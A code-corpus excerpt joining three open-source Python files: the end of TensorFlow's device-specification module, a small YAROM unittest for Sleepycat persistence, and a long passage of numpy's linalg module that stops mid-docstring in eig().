if self.device_type is not None:
device_index_string = "*"
if self.device_index is not None:
device_index_string = str(self.device_index)
dev += "/device:%s:%s" % (self.device_type, device_index_string)
return dev
def from_string(spec):
"""Construct a Device from a string.
Args:
spec: a string of the form
/job:<name>/replica:<id>/task:<id>/device:CPU:<id>
or
/job:<name>/replica:<id>/task:<id>/device:GPU:<id>
as cpu and gpu are mutually exclusive.
All entries are optional.
Returns:
A Device.
"""
return Device().parse_from_string(spec)
def check_valid(spec):
"""Check that a device spec is valid.
Args:
spec: a string.
Raises:
An exception if the spec is invalid.
"""
# Construct a device. It will assert a failure if spec is invalid.
from_string(spec)
def merge_device(spec):
"""Returns a device function that merges devices specifications.
This can be used to merge partial specifications of devices. The
innermost setting for a device field takes precedence. For example:
with tf.Device(MergeDevice("/device:GPU:0"))
# Nodes created here have device "/device:GPU:0"
with tf.Device(MergeDevice("/job:worker")):
# Nodes created here have device "/job:worker/device:GPU:0"
with tf.Device(MergeDevice("/device:CPU:0")):
# Nodes created here have device "/job:worker/device:CPU:0"
with tf.Device(MergeDevice("/job:ps")):
# Nodes created here have device "/job:ps/device:CPU:0"
Args:
spec: A device or a device spec string (partially) describing the
device that should be used for all nodes created in the scope of
the returned device function's with block.
Returns:
A device function with the above-described behavior.
Raises:
ValueError: if the spec was not valid.
"""
if not isinstance(spec, Device):
spec = from_string(spec or "")
def _device_function(node_def):
current_device = from_string(node_def.device or "")
copy_spec = copy.copy(spec)
copy_spec.merge_from(current_device) # current_device takes precedence.
return copy_spec
return _device_function
| arunhotra/tensorflow | tensorflow/python/framework/device.py | Python | apache-2.0 | 6,508 |
import unittest
import traceback
import shutil
from yarom.configure import Configuration, Configureable
from yarom.data import Data
from yarom.sleepycat import SleepyCatSource
from .base_test import TEST_NS, make_graph
HAS_BSDDB = False
try:
import bsddb
print("BSDDB:", bsddb.__file__)
HAS_BSDDB = True
except ImportError:
try:
import bsddb3
print("BSDDB:", bsddb3.__file__)
HAS_BSDDB = True
except:
HAS_BSDDB = False
class DataTest(unittest.TestCase):
@unittest.skipIf((not HAS_BSDDB), "Sleepycat requires working bsddb")
def test_Sleepycat_persistence(self):
""" Should be able to init without these values """
c = Configuration()
fname = 'Sleepycat_store'
c['rdf.source'] = 'Sleepycat'
c['rdf.store_conf'] = fname
c['rdf.namespace'] = TEST_NS
Configureable.conf = c
d = Data()
d.register_source(SleepyCatSource)
try:
d.openDatabase()
g = make_graph(20)
for x in g:
d['rdf.graph'].add(x)
d.closeDatabase()
d.openDatabase()
self.assertEqual(20, len(list(d['rdf.graph'])))
d.closeDatabase()
except:
traceback.print_exc()
self.fail("Bad state")
shutil.rmtree(fname)
| mwatts15/YAROM | tests/test_sleepycat.py | Python | bsd-3-clause | 1,353 |
"""Lite version of scipy.linalg.
Notes
-----
This module is a lite version of the linalg.py module in SciPy which
contains high-level Python interface to the LAPACK library. The lite
version only accesses the following LAPACK functions: dgesv, zgesv,
dgeev, zgeev, dgesdd, zgesdd, dgelsd, zgelsd, dsyevd, zheevd, dgetrf,
zgetrf, dpotrf, zpotrf, dgeqrf, zgeqrf, zungqr, dorgqr.
"""
from __future__ import division, absolute_import, print_function
__all__ = ['matrix_power', 'solve', 'tensorsolve', 'tensorinv', 'inv',
'cholesky', 'eigvals', 'eigvalsh', 'pinv', 'slogdet', 'det',
'svd', 'eig', 'eigh', 'lstsq', 'norm', 'qr', 'cond', 'matrix_rank',
'LinAlgError', 'multi_dot']
import warnings
from numpy.core import (
array, asarray, zeros, empty, empty_like, transpose, intc, single, double,
csingle, cdouble, inexact, complexfloating, newaxis, ravel, all, Inf, dot,
add, multiply, sqrt, maximum, fastCopyAndTranspose, sum, isfinite, size,
finfo, errstate, geterrobj, longdouble, moveaxis, amin, amax, product, abs,
broadcast, atleast_2d, intp, asanyarray, isscalar, object_, ones
)
from numpy.core.multiarray import normalize_axis_index
from numpy.lib import triu, asfarray
from numpy.linalg import lapack_lite, _umath_linalg
from numpy.matrixlib.defmatrix import matrix_power
# For Python2/3 compatibility
_N = b'N'
_V = b'V'
_A = b'A'
_S = b'S'
_L = b'L'
fortran_int = intc
# Error object
class LinAlgError(Exception):
"""
Generic Python-exception-derived object raised by linalg functions.
General purpose exception class, derived from Python's exception.Exception
class, programmatically raised in linalg functions when a Linear
Algebra-related condition would prevent further correct execution of the
function.
Parameters
----------
None
Examples
--------
>>> from numpy import linalg as LA
>>> LA.inv(np.zeros((2,2)))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "...linalg.py", line 350,
in inv return wrap(solve(a, identity(a.shape[0], dtype=a.dtype)))
File "...linalg.py", line 249,
in solve
raise LinAlgError('Singular matrix')
numpy.linalg.LinAlgError: Singular matrix
"""
pass
# Dealing with errors in _umath_linalg
_linalg_error_extobj = None
def _determine_error_states():
global _linalg_error_extobj
errobj = geterrobj()
bufsize = errobj[0]
with errstate(invalid='call', over='ignore',
divide='ignore', under='ignore'):
invalid_call_errmask = geterrobj()[1]
_linalg_error_extobj = [bufsize, invalid_call_errmask, None]
_determine_error_states()
def _raise_linalgerror_singular(err, flag):
raise LinAlgError("Singular matrix")
def _raise_linalgerror_nonposdef(err, flag):
raise LinAlgError("Matrix is not positive definite")
def _raise_linalgerror_eigenvalues_nonconvergence(err, flag):
raise LinAlgError("Eigenvalues did not converge")
def _raise_linalgerror_svd_nonconvergence(err, flag):
raise LinAlgError("SVD did not converge")
def get_linalg_error_extobj(callback):
extobj = list(_linalg_error_extobj)
extobj[2] = callback
return extobj
def _makearray(a):
new = asarray(a)
wrap = getattr(a, "__array_prepare__", new.__array_wrap__)
return new, wrap
def isComplexType(t):
return issubclass(t, complexfloating)
_real_types_map = {single : single,
double : double,
csingle : single,
cdouble : double}
_complex_types_map = {single : csingle,
double : cdouble,
csingle : csingle,
cdouble : cdouble}
def _realType(t, default=double):
return _real_types_map.get(t, default)
def _complexType(t, default=cdouble):
return _complex_types_map.get(t, default)
def _linalgRealType(t):
"""Cast the type t to either double or cdouble."""
return double
_complex_types_map = {single : csingle,
double : cdouble,
csingle : csingle,
cdouble : cdouble}
def _commonType(*arrays):
# in lite version, use higher precision (always double or cdouble)
result_type = single
is_complex = False
for a in arrays:
if issubclass(a.dtype.type, inexact):
if isComplexType(a.dtype.type):
is_complex = True
rt = _realType(a.dtype.type, default=None)
if rt is None:
# unsupported inexact scalar
raise TypeError("array type %s is unsupported in linalg" %
(a.dtype.name,))
else:
rt = double
if rt is double:
result_type = double
if is_complex:
t = cdouble
result_type = _complex_types_map[result_type]
else:
t = double
return t, result_type
# _fastCopyAndTranpose assumes the input is 2D (as all the calls in here are).
_fastCT = fastCopyAndTranspose
def _to_native_byte_order(*arrays):
ret = []
for arr in arrays:
if arr.dtype.byteorder not in ('=', '|'):
ret.append(asarray(arr, dtype=arr.dtype.newbyteorder('=')))
else:
ret.append(arr)
if len(ret) == 1:
return ret[0]
else:
return ret
def _fastCopyAndTranspose(type, *arrays):
cast_arrays = ()
for a in arrays:
if a.dtype.type is type:
cast_arrays = cast_arrays + (_fastCT(a),)
else:
cast_arrays = cast_arrays + (_fastCT(a.astype(type)),)
if len(cast_arrays) == 1:
return cast_arrays[0]
else:
return cast_arrays
def _assertRank2(*arrays):
for a in arrays:
if a.ndim != 2:
raise LinAlgError('%d-dimensional array given. Array must be '
'two-dimensional' % a.ndim)
def _assertRankAtLeast2(*arrays):
for a in arrays:
if a.ndim < 2:
raise LinAlgError('%d-dimensional array given. Array must be '
'at least two-dimensional' % a.ndim)
def _assertSquareness(*arrays):
for a in arrays:
if max(a.shape) != min(a.shape):
raise LinAlgError('Array must be square')
def _assertNdSquareness(*arrays):
for a in arrays:
if max(a.shape[-2:]) != min(a.shape[-2:]):
raise LinAlgError('Last 2 dimensions of the array must be square')
def _assertFinite(*arrays):
for a in arrays:
if not (isfinite(a).all()):
raise LinAlgError("Array must not contain infs or NaNs")
def _isEmpty2d(arr):
# check size first for efficiency
return arr.size == 0 and product(arr.shape[-2:]) == 0
def _assertNoEmpty2d(*arrays):
for a in arrays:
if _isEmpty2d(a):
raise LinAlgError("Arrays cannot be empty")
# Linear equations
def tensorsolve(a, b, axes=None):
"""
Solve the tensor equation ``a x = b`` for x.
It is assumed that all indices of `x` are summed over in the product,
together with the rightmost indices of `a`, as is done in, for example,
``tensordot(a, x, axes=b.ndim)``.
Parameters
----------
a : array_like
Coefficient tensor, of shape ``b.shape + Q``. `Q`, a tuple, equals
the shape of that sub-tensor of `a` consisting of the appropriate
number of its rightmost indices, and must be such that
``prod(Q) == prod(b.shape)`` (in which sense `a` is said to be
'square').
b : array_like
Right-hand tensor, which can be of any shape.
axes : tuple of ints, optional
Axes in `a` to reorder to the right, before inversion.
If None (default), no reordering is done.
Returns
-------
x : ndarray, shape Q
Raises
------
LinAlgError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
numpy.tensordot, tensorinv, numpy.einsum
Examples
--------
>>> a = np.eye(2*3*4)
>>> a.shape = (2*3, 4, 2, 3, 4)
>>> b = np.random.randn(2*3, 4)
>>> x = np.linalg.tensorsolve(a, b)
>>> x.shape
(2, 3, 4)
>>> np.allclose(np.tensordot(a, x, axes=3), b)
True
"""
a, wrap = _makearray(a)
b = asarray(b)
an = a.ndim
if axes is not None:
allaxes = list(range(0, an))
for k in axes:
allaxes.remove(k)
allaxes.insert(an, k)
a = a.transpose(allaxes)
oldshape = a.shape[-(an-b.ndim):]
prod = 1
for k in oldshape:
prod *= k
a = a.reshape(-1, prod)
b = b.ravel()
res = wrap(solve(a, b))
res.shape = oldshape
return res
def solve(a, b):
"""
Solve a linear matrix equation, or system of linear scalar equations.
Computes the "exact" solution, `x`, of the well-determined, i.e., full
rank, linear matrix equation `ax = b`.
Parameters
----------
a : (..., M, M) array_like
Coefficient matrix.
b : {(..., M,), (..., M, K)}, array_like
Ordinate or "dependent variable" values.
Returns
-------
x : {(..., M,), (..., M, K)} ndarray
Solution to the system a x = b. Returned shape is identical to `b`.
Raises
------
LinAlgError
If `a` is singular or not square.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The solutions are computed using LAPACK routine _gesv
`a` must be square and of full-rank, i.e., all rows (or, equivalently,
columns) must be linearly independent; if either is not true, use
`lstsq` for the least-squares best "solution" of the
system/equation.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pg. 22.
Examples
--------
Solve the system of equations ``3 * x0 + x1 = 9`` and ``x0 + 2 * x1 = 8``:
>>> a = np.array([[3,1], [1,2]])
>>> b = np.array([9,8])
>>> x = np.linalg.solve(a, b)
>>> x
array([ 2., 3.])
Check that the solution is correct:
>>> np.allclose(np.dot(a, x), b)
True
"""
a, _ = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
b, wrap = _makearray(b)
t, result_t = _commonType(a, b)
# We use the b = (..., M,) logic, only if the number of extra dimensions
# match exactly
if b.ndim == a.ndim - 1:
gufunc = _umath_linalg.solve1
else:
gufunc = _umath_linalg.solve
signature = 'DD->D' if isComplexType(t) else 'dd->d'
extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
r = gufunc(a, b, signature=signature, extobj=extobj)
return wrap(r.astype(result_t, copy=False))
def tensorinv(a, ind=2):
"""
Compute the 'inverse' of an N-dimensional array.
The result is an inverse for `a` relative to the tensordot operation
``tensordot(a, b, ind)``, i. e., up to floating-point accuracy,
``tensordot(tensorinv(a), a, ind)`` is the "identity" tensor for the
tensordot operation.
Parameters
----------
a : array_like
Tensor to 'invert'. Its shape must be 'square', i. e.,
``prod(a.shape[:ind]) == prod(a.shape[ind:])``.
ind : int, optional
Number of first indices that are involved in the inverse sum.
Must be a positive integer, default is 2.
Returns
-------
b : ndarray
`a`'s tensordot inverse, shape ``a.shape[ind:] + a.shape[:ind]``.
Raises
------
LinAlgError
If `a` is singular or not 'square' (in the above sense).
See Also
--------
numpy.tensordot, tensorsolve
Examples
--------
>>> a = np.eye(4*6)
>>> a.shape = (4, 6, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=2)
>>> ainv.shape
(8, 3, 4, 6)
>>> b = np.random.randn(4, 6)
>>> np.allclose(np.tensordot(ainv, b), np.linalg.tensorsolve(a, b))
True
>>> a = np.eye(4*6)
>>> a.shape = (24, 8, 3)
>>> ainv = np.linalg.tensorinv(a, ind=1)
>>> ainv.shape
(8, 3, 24)
>>> b = np.random.randn(24)
>>> np.allclose(np.tensordot(ainv, b, 1), np.linalg.tensorsolve(a, b))
True
"""
a = asarray(a)
oldshape = a.shape
prod = 1
if ind > 0:
invshape = oldshape[ind:] + oldshape[:ind]
for k in oldshape[ind:]:
prod *= k
else:
raise ValueError("Invalid ind argument.")
a = a.reshape(prod, -1)
ia = inv(a)
return ia.reshape(*invshape)
# Matrix inversion
def inv(a):
"""
Compute the (multiplicative) inverse of a matrix.
Given a square matrix `a`, return the matrix `ainv` satisfying
``dot(a, ainv) = dot(ainv, a) = eye(a.shape[0])``.
Parameters
----------
a : (..., M, M) array_like
Matrix to be inverted.
Returns
-------
ainv : (..., M, M) ndarray or matrix
(Multiplicative) inverse of the matrix `a`.
Raises
------
LinAlgError
If `a` is not square or inversion fails.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
Examples
--------
>>> from numpy.linalg import inv
>>> a = np.array([[1., 2.], [3., 4.]])
>>> ainv = inv(a)
>>> np.allclose(np.dot(a, ainv), np.eye(2))
True
>>> np.allclose(np.dot(ainv, a), np.eye(2))
True
If a is a matrix object, then the return value is a matrix as well:
>>> ainv = inv(np.matrix(a))
>>> ainv
matrix([[-2. , 1. ],
[ 1.5, -0.5]])
Inverses of several matrices can be computed at once:
>>> a = np.array([[[1., 2.], [3., 4.]], [[1, 3], [3, 5]]])
>>> inv(a)
array([[[-2. , 1. ],
[ 1.5, -0.5]],
[[-5. , 2. ],
[ 3. , -1. ]]])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
signature = 'D->D' if isComplexType(t) else 'd->d'
extobj = get_linalg_error_extobj(_raise_linalgerror_singular)
ainv = _umath_linalg.inv(a, signature=signature, extobj=extobj)
return wrap(ainv.astype(result_t, copy=False))
# Cholesky decomposition
def cholesky(a):
"""
Cholesky decomposition.
Return the Cholesky decomposition, `L * L.H`, of the square matrix `a`,
where `L` is lower-triangular and .H is the conjugate transpose operator
(which is the ordinary transpose if `a` is real-valued). `a` must be
Hermitian (symmetric if real-valued) and positive-definite. Only `L` is
actually returned.
Parameters
----------
a : (..., M, M) array_like
Hermitian (symmetric if all elements are real), positive-definite
input matrix.
Returns
-------
L : (..., M, M) array_like
Upper or lower-triangular Cholesky factor of `a`. Returns a
matrix object if `a` is a matrix object.
Raises
------
LinAlgError
If the decomposition fails, for example, if `a` is not
positive-definite.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The Cholesky decomposition is often used as a fast way of solving
.. math:: A \\mathbf{x} = \\mathbf{b}
(when `A` is both Hermitian/symmetric and positive-definite).
First, we solve for :math:`\\mathbf{y}` in
.. math:: L \\mathbf{y} = \\mathbf{b},
and then for :math:`\\mathbf{x}` in
.. math:: L.H \\mathbf{x} = \\mathbf{y}.
Examples
--------
>>> A = np.array([[1,-2j],[2j,5]])
>>> A
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> L = np.linalg.cholesky(A)
>>> L
array([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
>>> np.dot(L, L.T.conj()) # verify that L * L.H = A
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> A = [[1,-2j],[2j,5]] # what happens if A is only array_like?
>>> np.linalg.cholesky(A) # an ndarray object is returned
array([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
>>> # But a matrix object is returned if A is a matrix object
>>> LA.cholesky(np.matrix(A))
matrix([[ 1.+0.j, 0.+0.j],
[ 0.+2.j, 1.+0.j]])
"""
extobj = get_linalg_error_extobj(_raise_linalgerror_nonposdef)
gufunc = _umath_linalg.cholesky_lo
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
signature = 'D->D' if isComplexType(t) else 'd->d'
r = gufunc(a, signature=signature, extobj=extobj)
return wrap(r.astype(result_t, copy=False))
# QR decompostion
def qr(a, mode='reduced'):
"""
Compute the qr factorization of a matrix.
Factor the matrix `a` as *qr*, where `q` is orthonormal and `r` is
upper-triangular.
Parameters
----------
a : array_like, shape (M, N)
Matrix to be factored.
mode : {'reduced', 'complete', 'r', 'raw', 'full', 'economic'}, optional
If K = min(M, N), then
'reduced' : returns q, r with dimensions (M, K), (K, N) (default)
'complete' : returns q, r with dimensions (M, M), (M, N)
'r' : returns r only with dimensions (K, N)
'raw' : returns h, tau with dimensions (N, M), (K,)
'full' : alias of 'reduced', deprecated
'economic' : returns h from 'raw', deprecated.
The options 'reduced', 'complete, and 'raw' are new in numpy 1.8,
see the notes for more information. The default is 'reduced' and to
maintain backward compatibility with earlier versions of numpy both
it and the old default 'full' can be omitted. Note that array h
returned in 'raw' mode is transposed for calling Fortran. The
'economic' mode is deprecated. The modes 'full' and 'economic' may
be passed using only the first letter for backwards compatibility,
but all others must be spelled out. See the Notes for more
explanation.
Returns
-------
q : ndarray of float or complex, optional
A matrix with orthonormal columns. When mode = 'complete' the
result is an orthogonal/unitary matrix depending on whether or not
a is real/complex. The determinant may be either +/- 1 in that
case.
r : ndarray of float or complex, optional
The upper-triangular matrix.
(h, tau) : ndarrays of np.double or np.cdouble, optional
The array h contains the Householder reflectors that generate q
along with r. The tau array contains scaling factors for the
reflectors. In the deprecated 'economic' mode only h is returned.
Raises
------
LinAlgError
If factoring fails.
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dorgqr, and zungqr.
For more information on the qr factorization, see for example:
http://en.wikipedia.org/wiki/QR_factorization
Subclasses of `ndarray` are preserved except for the 'raw' mode. So if
`a` is of type `matrix`, all the return values will be matrices too.
New 'reduced', 'complete', and 'raw' options for mode were added in
NumPy 1.8.0 and the old option 'full' was made an alias of 'reduced'. In
addition the options 'full' and 'economic' were deprecated. Because
'full' was the previous default and 'reduced' is the new default,
backward compatibility can be maintained by letting `mode` default.
The 'raw' option was added so that LAPACK routines that can multiply
arrays by q using the Householder reflectors can be used. Note that in
this case the returned arrays are of type np.double or np.cdouble and
the h array is transposed to be FORTRAN compatible. No routines using
the 'raw' return are currently exposed by numpy, but some are available
in lapack_lite and just await the necessary work.
Examples
--------
>>> a = np.random.randn(9, 6)
>>> q, r = np.linalg.qr(a)
>>> np.allclose(a, np.dot(q, r)) # a does equal qr
True
>>> r2 = np.linalg.qr(a, mode='r')
>>> r3 = np.linalg.qr(a, mode='economic')
>>> np.allclose(r, r2) # mode='r' returns the same r as mode='full'
True
>>> # But only triu parts are guaranteed equal when mode='economic'
>>> np.allclose(r, np.triu(r3[:6,:6], k=0))
True
Example illustrating a common use of `qr`: solving of least squares
problems
What are the least-squares-best `m` and `y0` in ``y = y0 + mx`` for
the following data: {(0,1), (1,0), (1,2), (2,1)}. (Graph the points
and you'll see that it should be y0 = 0, m = 1.) The answer is provided
by solving the over-determined matrix equation ``Ax = b``, where::
A = array([[0, 1], [1, 1], [1, 1], [2, 1]])
x = array([[y0], [m]])
b = array([[1], [0], [2], [1]])
If A = qr such that q is orthonormal (which is always possible via
Gram-Schmidt), then ``x = inv(r) * (q.T) * b``. (In numpy practice,
however, we simply use `lstsq`.)
>>> A = np.array([[0, 1], [1, 1], [1, 1], [2, 1]])
>>> A
array([[0, 1],
[1, 1],
[1, 1],
[2, 1]])
>>> b = np.array([1, 0, 2, 1])
>>> q, r = LA.qr(A)
>>> p = np.dot(q.T, b)
>>> np.dot(LA.inv(r), p)
array([ 1.1e-16, 1.0e+00])
"""
if mode not in ('reduced', 'complete', 'r', 'raw'):
if mode in ('f', 'full'):
# 2013-04-01, 1.8
msg = "".join((
"The 'full' option is deprecated in favor of 'reduced'.\n",
"For backward compatibility let mode default."))
warnings.warn(msg, DeprecationWarning, stacklevel=2)
mode = 'reduced'
elif mode in ('e', 'economic'):
# 2013-04-01, 1.8
msg = "The 'economic' option is deprecated."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
mode = 'economic'
else:
raise ValueError("Unrecognized mode '%s'" % mode)
a, wrap = _makearray(a)
_assertRank2(a)
_assertNoEmpty2d(a)
m, n = a.shape
t, result_t = _commonType(a)
a = _fastCopyAndTranspose(t, a)
a = _to_native_byte_order(a)
mn = min(m, n)
tau = zeros((mn,), t)
if isComplexType(t):
lapack_routine = lapack_lite.zgeqrf
routine_name = 'zgeqrf'
else:
lapack_routine = lapack_lite.dgeqrf
routine_name = 'dgeqrf'
# calculate optimal size of work data 'work'
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, n, a, m, tau, work, -1, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# do qr decomposition
lwork = int(abs(work[0]))
work = zeros((lwork,), t)
results = lapack_routine(m, n, a, m, tau, work, lwork, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# handle modes that don't return q
if mode == 'r':
r = _fastCopyAndTranspose(result_t, a[:, :mn])
return wrap(triu(r))
if mode == 'raw':
return a, tau
if mode == 'economic':
if t != result_t :
a = a.astype(result_t, copy=False)
return wrap(a.T)
# generate q from a
if mode == 'complete' and m > n:
mc = m
q = empty((m, m), t)
else:
mc = mn
q = empty((n, m), t)
q[:n] = a
if isComplexType(t):
lapack_routine = lapack_lite.zungqr
routine_name = 'zungqr'
else:
lapack_routine = lapack_lite.dorgqr
routine_name = 'dorgqr'
# determine optimal lwork
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, mc, mn, q, m, tau, work, -1, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
# compute q
lwork = int(abs(work[0]))
work = zeros((lwork,), t)
results = lapack_routine(m, mc, mn, q, m, tau, work, lwork, 0)
if results['info'] != 0:
raise LinAlgError('%s returns %d' % (routine_name, results['info']))
q = _fastCopyAndTranspose(result_t, q[:mc])
r = _fastCopyAndTranspose(result_t, a[:, :mc])
return wrap(q), wrap(triu(r))
# Eigenvalues
def eigvals(a):
"""
Compute the eigenvalues of a general matrix.
Main difference between `eigvals` and `eig`: the eigenvectors aren't
returned.
Parameters
----------
a : (..., M, M) array_like
A complex- or real-valued matrix whose eigenvalues will be computed.
Returns
-------
w : (..., M,) ndarray
The eigenvalues, each repeated according to its multiplicity.
They are not necessarily ordered, nor are they necessarily
real for real matrices.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eig : eigenvalues and right eigenvectors of general arrays
eigvalsh : eigenvalues of symmetric or Hermitian arrays.
eigh : eigenvalues and eigenvectors of symmetric/Hermitian arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
This is implemented using the _geev LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
Examples
--------
Illustration, using the fact that the eigenvalues of a diagonal matrix
are its diagonal elements, that multiplying a matrix on the left
by an orthogonal matrix, `Q`, and on the right by `Q.T` (the transpose
of `Q`), preserves the eigenvalues of the "middle" matrix. In other words,
if `Q` is orthogonal, then ``Q * A * Q.T`` has the same eigenvalues as
``A``:
>>> from numpy import linalg as LA
>>> x = np.random.random()
>>> Q = np.array([[np.cos(x), -np.sin(x)], [np.sin(x), np.cos(x)]])
>>> LA.norm(Q[0, :]), LA.norm(Q[1, :]), np.dot(Q[0, :],Q[1, :])
(1.0, 1.0, 0.0)
Now multiply a diagonal matrix by Q on one side and by Q.T on the other:
>>> D = np.diag((-1,1))
>>> LA.eigvals(D)
array([-1., 1.])
>>> A = np.dot(Q, D)
>>> A = np.dot(A, Q.T)
>>> LA.eigvals(A)
array([ 1., -1.])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
_assertFinite(a)
t, result_t = _commonType(a)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
signature = 'D->D' if isComplexType(t) else 'd->D'
w = _umath_linalg.eigvals(a, signature=signature, extobj=extobj)
if not isComplexType(t):
if all(w.imag == 0):
w = w.real
result_t = _realType(result_t)
else:
result_t = _complexType(result_t)
return w.astype(result_t, copy=False)
def eigvalsh(a, UPLO='L'):
"""
Compute the eigenvalues of a Hermitian or real symmetric matrix.
Main difference from eigh: the eigenvectors are not computed.
Parameters
----------
a : (..., M, M) array_like
A complex- or real-valued matrix whose eigenvalues are to be
computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M,) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigh : eigenvalues and eigenvectors of symmetric/Hermitian arrays.
eigvals : eigenvalues of general real or complex arrays.
eig : eigenvalues and right eigenvectors of general real or complex
arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The eigenvalues are computed using LAPACK routines _syevd, _heevd
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, -2j], [2j, 5]])
>>> LA.eigvalsh(a)
array([ 0.17157288, 5.82842712])
>>> # demonstrate the treatment of the imaginary part of the diagonal
>>> a = np.array([[5+2j, 9-2j], [0+2j, 2-1j]])
>>> a
array([[ 5.+2.j, 9.-2.j],
[ 0.+2.j, 2.-1.j]])
>>> # with UPLO='L' this is numerically equivalent to using LA.eigvals()
>>> # with:
>>> b = np.array([[5.+0.j, 0.-2.j], [0.+2.j, 2.-0.j]])
>>> b
array([[ 5.+0.j, 0.-2.j],
[ 0.+2.j, 2.+0.j]])
>>> wa = LA.eigvalsh(a)
>>> wb = LA.eigvals(b)
>>> wa; wb
array([ 1., 6.])
array([ 6.+0.j, 1.+0.j])
"""
UPLO = UPLO.upper()
if UPLO not in ('L', 'U'):
raise ValueError("UPLO argument must be 'L' or 'U'")
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
if UPLO == 'L':
gufunc = _umath_linalg.eigvalsh_lo
else:
gufunc = _umath_linalg.eigvalsh_up
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
signature = 'D->d' if isComplexType(t) else 'd->d'
w = gufunc(a, signature=signature, extobj=extobj)
return w.astype(_realType(result_t), copy=False)
def _convertarray(a):
t, result_t = _commonType(a)
a = _fastCT(a.astype(t))
return a, t, result_t
# Eigenvectors
def eig(a):
"""
Compute the eigenvalues and right eigenvectors of a square array.
Parameters
----------
a : (..., M, M) array
Matrices for which the eigenvalues and right eigenvectors will
be computed
Returns
-------
w : (..., M) array
The eigenvalues, each repeated according to its multiplicity.
The eigenvalues are not necessarily ordered. The resulting
array will be of complex type, unless the imaginary part is
zero in which case it will be cast to a real type. When `a`
is real the resulting eigenvalues will be real (0 imaginary
part) or occur in conjugate pairs
v : (..., M, M) array
The normalized (unit "length") eigenvectors, such that the
column ``v[:,i]`` is the eigenvector corresponding to the
eigenvalue ``w[i]``.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigvals : eigenvalues of a non-symmetric array.
eigh : eigenvalues and eigenvectors of a symmetric or Hermitian
(conjugate symmetric) array.
eigvalsh : eigenvalues of a symmetric or Hermitian (conjugate symmetric)
array.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
This is implemented using the _geev LAPACK routines which compute
the eigenvalues and eigenvectors of general square arrays.
The number `w` is an eigenvalue of `a` if there exists a vector
`v` such that ``dot(a,v) = w * v``. Thus, the arrays `a`, `w`, and
`v` satisfy the equations ``dot(a[:,:], v[:,i]) = w[i] * v[:,i]``
for :math:`i \\in \\{0,...,M-1\\}`.
The array `v` of eigenvectors may not be of maximum rank, that is, some
of the columns may be linearly dependent, although round-off error may
obscure that fact. If the eigenvalues are all different, then theoretically
the eigenvectors are linearly independent. Likewise, the (complex-valued)
matrix of eigenvectors `v` is unitary if the matrix `a` is normal, i.e.,
if ``dot(a, a.H) = dot(a.H, a)``, where `a.H` denotes the conjugate
transpose of `a`.
Finally, it is emphasized that `v` consists of the *right* (as in
right-hand side) eigenvectors of `a`. A vector `y` satisfying
``dot(y.T, a) = z * y.T`` for some number `z` is called a *left*
eigenvector of `a`, and, in general, the left and right eigenvectors
of a matrix are not necessarily the (perhaps conjugate) transposes
of each other.
References
----------
G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando, FL,
Academic Press, Inc., 1980, Various pp.
Examples
--------
>>> from numpy import linalg as LA
(Almost) trivial example with real e-values and e-vectors.
>>> w, v = LA.eig(np.diag((1, 2, 3)))
>>> w; v
array([ 1., 2., 3.])
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]])
Real matrix possessing complex e-values and e-vectors; note that the
e-values are complex conjugates of each other.
>>> w, v = LA.eig(np.array([[1, -1], [1, 1]]))
>>> w; v
array([ 1. + 1.j, 1. - 1.j])
array([[ 0.70710678+0.j , 0.70710678+0.j ],
